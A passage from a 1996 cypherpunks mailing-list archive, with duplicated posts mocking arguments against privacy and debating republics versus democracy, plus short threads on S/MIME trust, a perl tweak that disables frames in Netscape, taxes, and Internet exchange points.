	***what's good for General Motors is good for the country.

  * "Privacy paranoids want to turn back the technological clock."

	***yes, number 4078956898346, your comment has been registered.

  * "Most people are privacy pragmatists who can be trusted to make
     intelligent trade-offs between functionality and privacy."

	***yes, just like people are inherently good, unless the 
		issue is money.

  * "Our lives will inevitably become visible to others, so the
     real issue is mutual visibility, achieving a balance of power
     by enabling us to watch the people who are watching us."

	***yes, you do not throw stones at others who live in glass houses.

  * "Once you really analyze it, the concept of privacy is so
     nebulous that it provides no useful guidance for action."

	***oh, it is better that government take no action???

  * "People *want* these systems, as indicated by the percentage
     of them who sign up for them once they become available."

	***dale carnegie: will you ever quit selling your ideas!

  * "Concern for privacy is anti-social and obstructs the building
     of a democratic society."

	***aaaah, taxation by representation?

  * "Privacy regulation is just one more category of government
     interference in the market, which after all is much better
     at weighing individuals' relative preferences for privacy
     and everything else than bureaucratic rules could ever be."

	***huuh?

  * "There's no privacy in public."

	***no? try screaming 'rape' in NYC

  * "We favor limited access."

	***to just the thought police?

  * "Privacy in these systems has not emerged as a national issue."



--
Overseeing first-rate programmers is a managerial challenge 
  roughly comparable to herding cats.

cc: Cypherpunks <cypherpunks@toad.com>
    Phil Agre <pagre@weber.ucsd.edu>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 7 May 1996 19:35:28 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Why Leahy is No Friend of Ours
Message-ID: <199605070532.WAA28709@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: E. ALLEN SMITH <EALLENSMITH@ocelot.Rutgers.EDU>
              Cypherpunks <cypherpunks@toad.com>

** Reply to note from E. ALLEN SMITH <EALLENSMITH@ocelot.Rutgers.EDU> 05/06/96  8:47pm       
= To: attila@primenet.com 
=  
= From:	IN%"attila@primenet.com"  "attila"  5-MAY-1996 21:36:54.93 
=  
= >        how many _truly_ "populist" presidents have we elected?  
=  
=  SMITH: 
= 	Given the numbers of times that a democracy has done more harm than 
= good to civil liberties (Prohibition, the election of Islamic Fundamentalists 
= in Algeria, etcetera), we don't _want_ a "populist"/demagogue president. We 
= want someone in charge (to whatever degree that someone has to be in charge) 
= who will respect civil liberties. The masses aren't going to elect such a 
= person; they prefer protection to liberty and always will. 
=  
= ATTILA: 
 
	democracy is _never_ the ideal government. the difference in the
    American government is that it is a _republic_.  the problem with a 
    republic in the techno age is that the press and/or advertising 
    creates the images --and can be bought, stolen, coerced, etc.

        my intent is to "lament" that the American voters do not 
    influence the choice of candidates --who are vetted my money, or 
    money's interests. 

        most mat not wish to consider the hidden importance of the CFR 
    and related groups --it is not a conspiracy; it is just another
    group with an agenda --except they have the money and influence to
    _buy_ the agenda over time --amd on their schedule.
 
 
= >  ATTILA: 
= >           "They that give up essential liberty to obtain a little  
= >               temporary safety deserve neither liberty nor safety." 
= >                        --Ben Franklin (Historical Review of PA -1759) 
= > 
= >    and, the bottom line is: 
= > 
= >              "It is not the function of our Government to keep the citizen 
= >                  from falling into error;  
= >               it is the function of the citizen to keep the Government  
= >                  from falling into error." 
= >                             --Robert H. Jackson (1892-1954), U.S. Judge 
=  
= 	Quite. 
= 	-Allen

--
Overseeing first-rate programmers is a managerial challenge 
  roughly comparable to herding cats.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 7 May 1996 19:23:45 +0800
To: Paul Penrod <furballs@netcom.com>
Subject: Re: Arguments _against_ privacy, anyone?
Message-ID: <199605070538.WAA22719@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



Date:    Sun, 21 Apr 1996 15:58:03 -0700 (PDT)

***where do some of these people get off the bus?


>From:    Phil Agre <pagre@weber.ucsd.edu>
Subject: Call for bad arguments against privacy

  * "We've lost so much of our privacy anyway."

	***and that justifies stripping you of the rest, correct?

  * "Privacy is an obsolete Victorian hang-up."

	***arrest that man for public nudity!

  * "Ideas about privacy are culturally specific and it is thus
     impossible to define privacy in the law without bias."

	***let me ask you, boy, just what the fuck you mean?

  * "We have strong security on our data."

	***yawn...

  * "National identity cards protect privacy by improving
     authentication and data security."

	***you must like to mutilate your body when they insert the chip?

  * "Informational privacy can be protected by converting it into
     a property right."

	***yes, if you not consider that the concept of property rights, 
		i.e. title, must be defined byins contents?

  * "We have to balance privacy against industry concerns."

	***what's good for General Motors is good for the country.

  * "Privacy paranoids want to turn back the technological clock."

	***yes, number 4078956898346, your comment has been registered.

  * "Most people are privacy pragmatists who can be trusted to make
     intelligent trade-offs between functionality and privacy."

	***yes, just like people are inherently good, unless the 
		issue is money.

  * "Our lives will inevitably become visible to others, so the
     real issue is mutual visibility, achieving a balance of power
     by enabling us to watch the people who are watching us."

	***yes, you do not throw stones at others who live in glass houses.

  * "Once you really analyze it, the concept of privacy is so
     nebulous that it provides no useful guidance for action."

	***oh, it is better that government take no action???

  * "People *want* these systems, as indicated by the percentage
     of them who sign up for them once they become available."

	***dale carnegie: will you ever quit selling your ideas!

  * "Concern for privacy is anti-social and obstructs the building
     of a democratic society."

	***aaaah, taxation by representation?

  * "Privacy regulation is just one more category of government
     interference in the market, which after all is much better
     at weighing individuals' relative preferences for privacy
     and everything else than bureaucratic rules could ever be."

	***huuh?

  * "There's no privacy in public."

	***no? try screaming 'rape' in NYC

  * "We favor limited access."

	***to just the thought police?

  * "Privacy in these systems has not emerged as a national issue."



--
Overseeing first-rate programmers is a managerial challenge 
  roughly comparable to herding cats.

cc: Cypherpunks <cypherpunks@toad.com>
    Phil Agre <pagre@weber.ucsd.edu>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 7 May 1996 20:06:18 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Why Leahy is No Friend of Ours
Message-ID: <199605070538.WAA22765@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: E. ALLEN SMITH <EALLENSMITH@ocelot.Rutgers.EDU>
              Cypherpunks <cypherpunks@toad.com>

** Reply to note from E. ALLEN SMITH <EALLENSMITH@ocelot.Rutgers.EDU> 05/06/96  8:47pm       
= To: attila@primenet.com 
=  
= From:	IN%"attila@primenet.com"  "attila"  5-MAY-1996 21:36:54.93 
=  
= >        how many _truly_ "populist" presidents have we elected?  
=  
=  SMITH: 
= 	Given the numbers of times that a democracy has done more harm than 
= good to civil liberties (Prohibition, the election of Islamic Fundamentalists 
= in Algeria, etcetera), we don't _want_ a "populist"/demagogue president. We 
= want someone in charge (to whatever degree that someone has to be in charge) 
= who will respect civil liberties. The masses aren't going to elect such a 
= person; they prefer protection to liberty and always will. 
=  
= ATTILA: 
 
	democracy is _never_ the ideal government. the difference in the
    American government is that it is a _republic_.  the problem with a 
    republic in the techno age is that the press and/or advertising 
    creates the images --and can be bought, stolen, coerced, etc.

        my intent is to "lament" that the American voters do not 
    influence the choice of candidates --who are vetted my money, or 
    money's interests. 

        most mat not wish to consider the hidden importance of the CFR 
    and related groups --it is not a conspiracy; it is just another
    group with an agenda --except they have the money and influence to
    _buy_ the agenda over time --amd on their schedule.
 
 
= >  ATTILA: 
= >           "They that give up essential liberty to obtain a little  
= >               temporary safety deserve neither liberty nor safety." 
= >                        --Ben Franklin (Historical Review of PA -1759) 
= > 
= >    and, the bottom line is: 
= > 
= >              "It is not the function of our Government to keep the citizen 
= >                  from falling into error;  
= >               it is the function of the citizen to keep the Government  
= >                  from falling into error." 
= >                             --Robert H. Jackson (1892-1954), U.S. Judge 
=  
= 	Quite. 
= 	-Allen

--
Overseeing first-rate programmers is a managerial challenge 
  roughly comparable to herding cats.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 7 May 1996 19:20:09 +0800
To: Paul Penrod <furballs@netcom.com>
Subject: Re: Arguments _against_ privacy, anyone?
Message-ID: <199605070552.WAA04190@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



Date:    Sun, 21 Apr 1996 15:58:03 -0700 (PDT)

***where do some of these people get off the bus?


>From:    Phil Agre <pagre@weber.ucsd.edu>
Subject: Call for bad arguments against privacy

  * "We've lost so much of our privacy anyway."

	***and that justifies stripping you of the rest, correct?

  * "Privacy is an obsolete Victorian hang-up."

	***arrest that man for public nudity!

  * "Ideas about privacy are culturally specific and it is thus
     impossible to define privacy in the law without bias."

	***let me ask you, boy, just what the fuck you mean?

  * "We have strong security on our data."

	***yawn...

  * "National identity cards protect privacy by improving
     authentication and data security."

	***you must like to mutilate your body when they insert the chip?

  * "Informational privacy can be protected by converting it into
     a property right."

	***yes, if you not consider that the concept of property rights, 
		i.e. title, must be defined byins contents?

  * "We have to balance privacy against industry concerns."

	***what's good for General Motors is good for the country.

  * "Privacy paranoids want to turn back the technological clock."

	***yes, number 4078956898346, your comment has been registered.

  * "Most people are privacy pragmatists who can be trusted to make
     intelligent trade-offs between functionality and privacy."

	***yes, just like people are inherently good, unless the 
		issue is money.

  * "Our lives will inevitably become visible to others, so the
     real issue is mutual visibility, achieving a balance of power
     by enabling us to watch the people who are watching us."

	***yes, you do not throw stones at others who live in glass houses.

  * "Once you really analyze it, the concept of privacy is so
     nebulous that it provides no useful guidance for action."

	***oh, it is better that government take no action???

  * "People *want* these systems, as indicated by the percentage
     of them who sign up for them once they become available."

	***dale carnegie: will you ever quit selling your ideas!

  * "Concern for privacy is anti-social and obstructs the building
     of a democratic society."

	***aaaah, taxation by representation?

  * "Privacy regulation is just one more category of government
     interference in the market, which after all is much better
     at weighing individuals' relative preferences for privacy
     and everything else than bureaucratic rules could ever be."

	***huuh?

  * "There's no privacy in public."

	***no? try screaming 'rape' in NYC

  * "We favor limited access."

	***to just the thought police?

  * "Privacy in these systems has not emerged as a national issue."



--
Overseeing first-rate programmers is a managerial challenge 
  roughly comparable to herding cats.

cc: Cypherpunks <cypherpunks@toad.com>
    Phil Agre <pagre@weber.ucsd.edu>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 7 May 1996 19:22:25 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Why Leahy is No Friend of Ours
Message-ID: <199605070553.WAA04253@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: E. ALLEN SMITH <EALLENSMITH@ocelot.Rutgers.EDU>
              Cypherpunks <cypherpunks@toad.com>

** Reply to note from E. ALLEN SMITH <EALLENSMITH@ocelot.Rutgers.EDU> 05/06/96  8:47pm       
= To: attila@primenet.com 
=  
= From:	IN%"attila@primenet.com"  "attila"  5-MAY-1996 21:36:54.93 
=  
= >        how many _truly_ "populist" presidents have we elected?  
=  
=  SMITH: 
= 	Given the numbers of times that a democracy has done more harm than 
= good to civil liberties (Prohibition, the election of Islamic Fundamentalists 
= in Algeria, etcetera), we don't _want_ a "populist"/demagogue president. We 
= want someone in charge (to whatever degree that someone has to be in charge) 
= who will respect civil liberties. The masses aren't going to elect such a 
= person; they prefer protection to liberty and always will. 
=  
= ATTILA: 
 
	democracy is _never_ the ideal government. the difference in the
    American government is that it is a _republic_.  the problem with a 
    republic in the techno age is that the press and/or advertising 
    creates the images --and can be bought, stolen, coerced, etc.

        my intent is to "lament" that the American voters do not 
    influence the choice of candidates --who are vetted my money, or 
    money's interests. 

        most mat not wish to consider the hidden importance of the CFR 
    and related groups --it is not a conspiracy; it is just another
    group with an agenda --except they have the money and influence to
    _buy_ the agenda over time --amd on their schedule.
 
 
= >  ATTILA: 
= >           "They that give up essential liberty to obtain a little  
= >               temporary safety deserve neither liberty nor safety." 
= >                        --Ben Franklin (Historical Review of PA -1759) 
= > 
= >    and, the bottom line is: 
= > 
= >              "It is not the function of our Government to keep the citizen 
= >                  from falling into error;  
= >               it is the function of the citizen to keep the Government  
= >                  from falling into error." 
= >                             --Robert H. Jackson (1892-1954), U.S. Judge 
=  
= 	Quite. 
= 	-Allen

--
Overseeing first-rate programmers is a managerial challenge 
  roughly comparable to herding cats.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 7 May 1996 19:13:59 +0800
To: Paul Penrod <furballs@netcom.com>
Subject: Re: Arguments _against_ privacy, anyone?
Message-ID: <199605070555.WAA18449@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



Date:    Sun, 21 Apr 1996 15:58:03 -0700 (PDT)

***where do some of these people get off the bus?


>From:    Phil Agre <pagre@weber.ucsd.edu>
Subject: Call for bad arguments against privacy

  * "We've lost so much of our privacy anyway."

	***and that justifies stripping you of the rest, correct?

  * "Privacy is an obsolete Victorian hang-up."

	***arrest that man for public nudity!

  * "Ideas about privacy are culturally specific and it is thus
     impossible to define privacy in the law without bias."

	***let me ask you, boy, just what the fuck you mean?

  * "We have strong security on our data."

	***yawn...

  * "National identity cards protect privacy by improving
     authentication and data security."

	***you must like to mutilate your body when they insert the chip?

  * "Informational privacy can be protected by converting it into
     a property right."

	***yes, if you not consider that the concept of property rights, 
		i.e. title, must be defined byins contents?

  * "We have to balance privacy against industry concerns."

	***what's good for General Motors is good for the country.

  * "Privacy paranoids want to turn back the technological clock."

	***yes, number 4078956898346, your comment has been registered.

  * "Most people are privacy pragmatists who can be trusted to make
     intelligent trade-offs between functionality and privacy."

	***yes, just like people are inherently good, unless the 
		issue is money.

  * "Our lives will inevitably become visible to others, so the
     real issue is mutual visibility, achieving a balance of power
     by enabling us to watch the people who are watching us."

	***yes, you do not throw stones at others who live in glass houses.

  * "Once you really analyze it, the concept of privacy is so
     nebulous that it provides no useful guidance for action."

	***oh, it is better that government take no action???

  * "People *want* these systems, as indicated by the percentage
     of them who sign up for them once they become available."

	***dale carnegie: will you ever quit selling your ideas!

  * "Concern for privacy is anti-social and obstructs the building
     of a democratic society."

	***aaaah, taxation by representation?

  * "Privacy regulation is just one more category of government
     interference in the market, which after all is much better
     at weighing individuals' relative preferences for privacy
     and everything else than bureaucratic rules could ever be."

	***huuh?

  * "There's no privacy in public."

	***no? try screaming 'rape' in NYC

  * "We favor limited access."

	***to just the thought police?

  * "Privacy in these systems has not emerged as a national issue."



--
Overseeing first-rate programmers is a managerial challenge 
  roughly comparable to herding cats.

cc: Cypherpunks <cypherpunks@toad.com>
    Phil Agre <pagre@weber.ucsd.edu>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 7 May 1996 19:31:59 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Why Leahy is No Friend of Ours
Message-ID: <199605070555.WAA18489@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: E. ALLEN SMITH <EALLENSMITH@ocelot.Rutgers.EDU>
              Cypherpunks <cypherpunks@toad.com>

** Reply to note from E. ALLEN SMITH <EALLENSMITH@ocelot.Rutgers.EDU> 05/06/96  8:47pm       
= To: attila@primenet.com 
=  
= From:	IN%"attila@primenet.com"  "attila"  5-MAY-1996 21:36:54.93 
=  
= >        how many _truly_ "populist" presidents have we elected?  
=  
=  SMITH: 
= 	Given the numbers of times that a democracy has done more harm than 
= good to civil liberties (Prohibition, the election of Islamic Fundamentalists 
= in Algeria, etcetera), we don't _want_ a "populist"/demagogue president. We 
= want someone in charge (to whatever degree that someone has to be in charge) 
= who will respect civil liberties. The masses aren't going to elect such a 
= person; they prefer protection to liberty and always will. 
=  
= ATTILA: 
 
	democracy is _never_ the ideal government. the difference in the
    American government is that it is a _republic_.  the problem with a 
    republic in the techno age is that the press and/or advertising 
    creates the images --and can be bought, stolen, coerced, etc.

        my intent is to "lament" that the American voters do not 
    influence the choice of candidates --who are vetted my money, or 
    money's interests. 

        most mat not wish to consider the hidden importance of the CFR 
    and related groups --it is not a conspiracy; it is just another
    group with an agenda --except they have the money and influence to
    _buy_ the agenda over time --amd on their schedule.
 
 
= >  ATTILA: 
= >           "They that give up essential liberty to obtain a little  
= >               temporary safety deserve neither liberty nor safety." 
= >                        --Ben Franklin (Historical Review of PA -1759) 
= > 
= >    and, the bottom line is: 
= > 
= >              "It is not the function of our Government to keep the citizen 
= >                  from falling into error;  
= >               it is the function of the citizen to keep the Government  
= >                  from falling into error." 
= >                             --Robert H. Jackson (1892-1954), U.S. Judge 
=  
= 	Quite. 
= 	-Allen

--
Overseeing first-rate programmers is a managerial challenge 
  roughly comparable to herding cats.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 7 May 1996 21:23:32 +0800
To: Paul Penrod <furballs@netcom.com>
Subject: Re: Arguments _against_ privacy, anyone?
Message-ID: <199605070558.WAA25884@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



Date:    Sun, 21 Apr 1996 15:58:03 -0700 (PDT)

***where do some of these people get off the bus?


>From:    Phil Agre <pagre@weber.ucsd.edu>
Subject: Call for bad arguments against privacy

  * "We've lost so much of our privacy anyway."

	***and that justifies stripping you of the rest, correct?

  * "Privacy is an obsolete Victorian hang-up."

	***arrest that man for public nudity!

  * "Ideas about privacy are culturally specific and it is thus
     impossible to define privacy in the law without bias."

	***let me ask you, boy, just what the fuck you mean?

  * "We have strong security on our data."

	***yawn...

  * "National identity cards protect privacy by improving
     authentication and data security."

	***you must like to mutilate your body when they insert the chip?

  * "Informational privacy can be protected by converting it into
     a property right."

	***yes, if you not consider that the concept of property rights, 
		i.e. title, must be defined byins contents?

  * "We have to balance privacy against industry concerns."

	***what's good for General Motors is good for the country.

  * "Privacy paranoids want to turn back the technological clock."

	***yes, number 4078956898346, your comment has been registered.

  * "Most people are privacy pragmatists who can be trusted to make
     intelligent trade-offs between functionality and privacy."

	***yes, just like people are inherently good, unless the 
		issue is money.

  * "Our lives will inevitably become visible to others, so the
     real issue is mutual visibility, achieving a balance of power
     by enabling us to watch the people who are watching us."

	***yes, you do not throw stones at others who live in glass houses.

  * "Once you really analyze it, the concept of privacy is so
     nebulous that it provides no useful guidance for action."

	***oh, it is better that government take no action???

  * "People *want* these systems, as indicated by the percentage
     of them who sign up for them once they become available."

	***dale carnegie: will you ever quit selling your ideas!

  * "Concern for privacy is anti-social and obstructs the building
     of a democratic society."

	***aaaah, taxation by representation?

  * "Privacy regulation is just one more category of government
     interference in the market, which after all is much better
     at weighing individuals' relative preferences for privacy
     and everything else than bureaucratic rules could ever be."

	***huuh?

  * "There's no privacy in public."

	***no? try screaming 'rape' in NYC

  * "We favor limited access."

	***to just the thought police?

  * "Privacy in these systems has not emerged as a national issue."



--
Overseeing first-rate programmers is a managerial challenge 
  roughly comparable to herding cats.

cc: Cypherpunks <cypherpunks@toad.com>
    Phil Agre <pagre@weber.ucsd.edu>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 7 May 1996 21:10:28 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Why Leahy is No Friend of Ours
Message-ID: <199605070558.WAA25921@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: E. ALLEN SMITH <EALLENSMITH@ocelot.Rutgers.EDU>
              Cypherpunks <cypherpunks@toad.com>

** Reply to note from E. ALLEN SMITH <EALLENSMITH@ocelot.Rutgers.EDU> 05/06/96  8:47pm       
= To: attila@primenet.com 
=  
= From:	IN%"attila@primenet.com"  "attila"  5-MAY-1996 21:36:54.93 
=  
= >        how many _truly_ "populist" presidents have we elected?  
=  
=  SMITH: 
= 	Given the numbers of times that a democracy has done more harm than 
= good to civil liberties (Prohibition, the election of Islamic Fundamentalists 
= in Algeria, etcetera), we don't _want_ a "populist"/demagogue president. We 
= want someone in charge (to whatever degree that someone has to be in charge) 
= who will respect civil liberties. The masses aren't going to elect such a 
= person; they prefer protection to liberty and always will. 
=  
= ATTILA: 
 
	democracy is _never_ the ideal government. the difference in the
    American government is that it is a _republic_.  the problem with a 
    republic in the techno age is that the press and/or advertising 
    creates the images --and can be bought, stolen, coerced, etc.

        my intent is to "lament" that the American voters do not 
    influence the choice of candidates --who are vetted my money, or 
    money's interests. 

        most mat not wish to consider the hidden importance of the CFR 
    and related groups --it is not a conspiracy; it is just another
    group with an agenda --except they have the money and influence to
    _buy_ the agenda over time --amd on their schedule.
 
 
= >  ATTILA: 
= >           "They that give up essential liberty to obtain a little  
= >               temporary safety deserve neither liberty nor safety." 
= >                        --Ben Franklin (Historical Review of PA -1759) 
= > 
= >    and, the bottom line is: 
= > 
= >              "It is not the function of our Government to keep the citizen 
= >                  from falling into error;  
= >               it is the function of the citizen to keep the Government  
= >                  from falling into error." 
= >                             --Robert H. Jackson (1892-1954), U.S. Judge 
=  
= 	Quite. 
= 	-Allen

--
Overseeing first-rate programmers is a managerial challenge 
  roughly comparable to herding cats.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Wed, 8 May 1996 08:16:27 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: PGP, Inc.
In-Reply-To: <01I4E39N3LA28Y583T@mbcl.rutgers.edu>
Message-ID: <318F622D.5ABACBD6@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


E. ALLEN SMITH wrote:
> 
>         Can one use a web-of-trust for S/MIME, for the cases when a structured
> hierarchy is exactly the _wrong_ thing to use? I'd think so, but I don't know
> anything about it.

   The S/MIME spec indicates the use of X.509v3 certificates, which, in
turn, are explicitly allowed to contain trust roots originating in the
client's local configuration. In other words, yes, the spec allows for a
Web of trust.
   The big question, of course, is how easy the key management will be
in such a case. Everything I've seen points to key management being
super-easy if you use VeriSign certs, and probably just as bad as PGP
otherwise. Unlike PGP, most e-mail clients will probably not come
configured with the capablity to sign other keys - in the X.500 world,
e-mail clients and "certification authorities" are two separate
applications.
   But it's too early to tell. There's a lot of ferment happening here.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Robert LoVerso <John@loverso.southborough.ma.us>
Date: Wed, 8 May 1996 03:30:33 +0800
To: Alex Strasheim <alex@proust.suba.com>
Subject: Re: fixing netscape
In-Reply-To: <199605070349.WAA01122@proust.suba.com>
Message-ID: <07May96.082945@LoVerso.Southborough.MA.US>
MIME-Version: 1.0
Content-Type: text/plain


It's a shame he wrote all that C code when this suffices

	perl -i.orig -pe '
		s/\bnoframes\b/nofraMes/g;
		s/\bframeset\b/fraMeset/g' netscape*

also, you don't need to xxxx out the tags; Netscape downcases incoming HTML
and then uses strcmp().

John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay.Olbon@dynetics.com (Clay Olbon II)
Date: Wed, 8 May 1996 04:19:18 +0800
To: cypherpunks@toad.com
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <v01540b01adb4f2846a50@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:20 PM 5/6/96, E. ALLEN SMITH wrote:
>From:   IN%"frissell@panix.com"  "Duncan Frissell"  6-MAY-1996 16:04:24.96
>
>>Actually, as a percentage of income, tax evasion is probably more prevalent
>>among the poor than the rich.  Because they are less exposed.  Studies of
>>spending show that the poorest 20% of Americans spend twice their reported
>>income.
>
>        Quite. The poor can get away with this for multiple reasons, including
>being on more of a cash-based economy. But the largest reason is probably
>that the IRS doesn't care nearly as much about each individual at the low
>end of the income ladder as they do about any evasion involving a lot of money.
>Now, the low end tax evasion probably costs the government a lot more than
>the rich does... but it's also a lot harder to pursue.
>        -Allen

There are a couple of main reasons that the poor spend more than their
reported income.  First, many of the elderly are included in the "poorest
20%", since this is based on income alone and not net worth.  Many of the
elderly are spending down their retirement savings.  Another factor, of
course, is that welfare, food stamps, free/subsidized housing and other
transfer payments are not included in income calculations.  I have seen
reports that show that in many states, this is equivalent to a full-time
job paying ~$9/hr.  Not showing these as income helps keep the "official"
poverty rate high.  I'm not sure if social security is included in income
calculations for "poverty rate" purposes, anyone know?

        Clay

---------------------------------------------------------------------------
Clay Olbon II            | Clay.Olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: on web page
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
                     TANSTAAFL
---------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Wed, 8 May 1996 08:19:41 +0800
To: cypherpunks <cypherpunks@sybase.com>
Subject: Re: Is the network layer geodesic?
Message-ID: <9605071548.AA20120@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


Actually, MAE-WEST and much of the MCI net is now
OC-3, and the remaining DS3 lines will be upgraded soon.

And yes, it still doesn't take many T3's to fill that up, but
don't forget that networks are designed with serious 
overbooking in mind, and IP's back-off algorithm seems
to work real well in this situation.

     Ryan

---------- Previous Message ----------
To: rah
cc: cypherpunks
From: fair @ clock.org ("Erik E. Fair"  (Time Keeper)) @ smtp
Date: 05/06/96 07:58:46 PM
Subject: Re: Is the network layer geodesic?

The principle problem is that public exchange points do not scale beyond
current LAN technology (i.e. half-duplex 100 Mb/s FDDI or Ethernet), and
how many DS3 (T3; 45Mb/s full-duplex!) pipes does it take to fill that up?
Two.

Now, drop a DEC GIGAswitch in there (16 FDDI ports, 3.2Gb/s backplane), and
now you can have sixteen peers on the exchange. Last count I saw, there are
1,800 ISPs operating in the USA alone, and *everyone* want to be at the
exchange points. Oops. How many exchange points are there? Well:

NSF Network Access Points (NAPs): New York (well, Pennsauken, NJ; Sprint),
Chicago (Ameritech), San Francisco (Pac*Bell)
MAE-EAST (D.C.), MAE-WEST (Mountain View-San Jose), MAE-LA, CIX (San Jose)
FIX-EAST (D.C.), FIX-WEST (Mountain View; just for the Feds)
SWAB (D.C., but almost no one left there).

There are probably a few new ones that are forming that I am unaware of as
yet, but the point is that they're small-fry. There are also probably
exchange points outside the USA, but I bet they're being held up with PTT
B.S.

The Internet is amorphous. It ain't a star, exactly, but it still not too
far from that. However, to get away from this situation into the rich and
more fully amorphous connectivity we used to take for granted in the UUCP
network, we're going to have to see a lot more cooperation on the part of
the small ISPs in agreeing to talk *directly* to each other to exchange
traffic, and more small exchange points, instead of the small number of
large ones.

Of course, this means that you, Mr. or Ms. Discriminating Internet
Consumer, must educate yourself a little, and ask interesting questions
like, "why do my packets have to go to California to get across town to the
ISP my friend uses?" If the customers ask, the ISPs will serve. They just
gotta know what you want (and you have to be willing, of course, to pay for
it).

Erik Fair









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay.Olbon@dynetics.com (Clay Olbon II)
Date: Wed, 8 May 1996 04:23:32 +0800
To: cypherpunks@toad.com
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <v01540b03adb4fc67bcf2@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:34 PM 5/6/96, Timothy C. May wrote:
>Also, the effect of inflation has been to inflate salaries and thus inflate
>people into higher tax brackets, even when their "real wages" have not gone
>up.

This used to be true.  A bill passed during the Reagan administration
indexed the brackets to inflation to remedy this situation.  I don't know
how succesful the bill was in eliminating "bracket creep", but that was the
stated purpose.

>If we ever get really bad inflation again (>10% per year, as we had in the
>late 70s, early 90s), or, God forbid, hyper-inflation, the tax system will
>likely not survive in anything near its current form.

Hopefully the system won't survive no matter what the inflation rate is.

        Clay







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 8 May 1996 08:33:13 +0800
To: Stephan Somogyi <somogyi@digmedia.com>
Subject: Re: WhoWhere Robot?
In-Reply-To: <v03006b0aadb482c06662@[198.93.25.98]>
Message-ID: <Pine.GUL.3.93.960507095515.10619A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I would not be surprised. Please give me more information. I'm meeting
with them at 1pm PST today. 

-rich

On Mon, 6 May 1996, Stephan Somogyi wrote:

> My web server was just hit by a machine that reverse-resolved to a
> Japanese academic domain with an agent claiming to be "WhoWhere Robot";
> this bot is not listed in the
> <http://info.webcrawler.com/mak/projects/robots/active.html> List of
> Robots.
> 
> Does anyone know whether this has any relationship to the
> www.whowhere.com people?
> 
> ________________________________________________________________________
> Stephan Somogyi                Mr Gyroscope                Digital Media
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 8 May 1996 09:07:42 +0800
To: cypherpunks@toad.com
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <adb4d18200021004b6ac@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:17 PM 5/7/96, Clay Olbon II wrote:
>At 5:34 PM 5/6/96, Timothy C. May wrote:
>>Also, the effect of inflation has been to inflate salaries and thus inflate
>>people into higher tax brackets, even when their "real wages" have not gone
>>up.
>
>This used to be true.  A bill passed during the Reagan administration
>indexed the brackets to inflation to remedy this situation.  I don't know
>how succesful the bill was in eliminating "bracket creep", but that was the
>stated purpose.

No, it _still_ is true. One bill during one administration does not a major
change make.

Look at the actual rates, average salaries, increases, etc.

(Sure, there have been all sorts of rate increases, decreases, changes,
loopholes added, loopholes subtracted, etc. But the fact is that the
average starting salary for an EE was about $12,000 a year in 1975 and more
than 30,000 in 1995, with about the same buying power but with tax _rates_
dramatically higher.)

--Tim May

Boycott "Big Brother Inside" software!
